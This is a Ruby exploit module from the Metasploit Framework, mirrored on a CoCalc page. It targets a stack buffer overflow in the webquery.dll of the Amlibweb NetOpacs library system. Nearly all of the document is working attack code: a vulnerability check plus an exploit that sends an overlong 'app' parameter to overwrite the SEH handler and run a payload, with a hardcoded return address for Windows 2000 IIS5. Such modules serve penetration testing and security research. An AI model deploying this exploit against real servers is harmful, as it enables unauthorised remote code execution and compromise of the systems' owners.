CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'         => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',

15
      'Description'  => %q{

16
          This module exploits a stack buffer overflow in Amlib's Amlibweb

17
        Library Management System (NetOpacs). The webquery.dll

18
        API is available through IIS requests. By specifying

19
        an overly long string to the 'app' parameter, SeH can be

20
        reliably overwritten allowing for arbitrary remote code execution.

21
        In addition, it is possible to overwrite EIP by specifying

22
        an arbitrary parameter name with an '=' terminator.

23
      },

24
      'Author'       => [ 'aushack' ],

25
      'Arch'         => [ ARCH_X86 ],

26
      'License'      => MSF_LICENSE,

27
      'References'   =>

28
        [

29
          [ 'OSVDB', '66814' ],

30
          [ 'BID', '42293' ],

31
          [ 'URL', 'http://www.aushack.com/advisories/' ],

32
        ],

33
      'Privileged'		=> true,

34
      'DefaultOptions'	=>

35
        {

36
          'EXITFUNC'	=> 'thread',

37
          'AllowWin32SEH' => true

38
        },

39
      'Payload'		=>

40
        {

41
          #'Space'			=> 600,

42
          'BadChars' 		=> "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",

43
          'EncoderType'		=> Msf::Encoder::Type::AlphanumMixed,

44
          'DisableNops'  		=>  'True',

45
          'StackAdjustment' 	=> -3500,

46
        },

47
      'Platform' => ['win'],

48
      'Targets'  =>

49
        [

50
          # aushack - Tested OK 20100803 w2k IIS5

51
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5

52
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.

53
        ],

54
      'DisclosureDate' => '2010-08-03', #0day

55
      'DefaultTarget' => 0))

56


57
    register_options(

58
      [

59
        Opt::RPORT(80),

60
      ])

61
  end

62


63
  def check

64
    connect

65


66
    rand = Rex::Text.rand_text_alpha(10)

67


68
    sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")

69
    res = sock.get_once

70
    disconnect

71


72
    if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)

73
      if ($1 == rand)

74
        return Exploit::CheckCode::Vulnerable

75
      end

76
    end

77
    Exploit::CheckCode::Safe

78
  end

79


80
  def exploit

81
    connect

82
    seh = generate_seh_payload(target.ret)

83


84
    buffer = Rex::Text.rand_text_alphanumeric(3028) + seh

85
    sploit = "GET /amlibweb/webquery.dll?app="  + buffer + " HTTP/1.0\r\n"

86
    sock.put(sploit + "\r\n\r\n")

87


88
    handler

89
    disconnect

90
  end

91
end

92


93